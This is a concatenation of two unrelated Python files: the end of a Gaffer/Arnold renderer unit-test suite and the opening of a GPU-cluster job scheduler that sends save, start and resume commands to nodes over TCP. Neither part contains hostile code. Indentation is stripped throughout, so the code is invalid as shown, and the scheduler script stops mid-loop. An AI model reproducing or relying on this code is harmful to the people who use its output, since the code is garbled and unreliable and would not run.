self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 0 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -96 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 47 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.registerAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
group["in"].addChild( GafferScene.ScenePlug( "in4" ) )
evaluate = GafferScene.EvaluateLightLinks()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
group["in"]["in1"].setInput( attributes["out"] )
group["in"]["in2"].setInput( light1["out"] )
group["in"]["in3"].setInput( light2["out"] )
group["in"]["in4"].setInput( sphere2["out"] )
evaluate["in"].setInput( group["out"] )
render["in"].setInput( evaluate["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )
# make sure we pass correct data into the renderer
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
if __name__ == "__main__":
unittest.main()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
K80_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
qualified_job = []
pc_job = [] # list of jobs that are pratically completed
K80_node = 'c2180'
host_node = 'c0173'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 600s or 10min as threshold
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
############### first clear finish status of all jobs ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
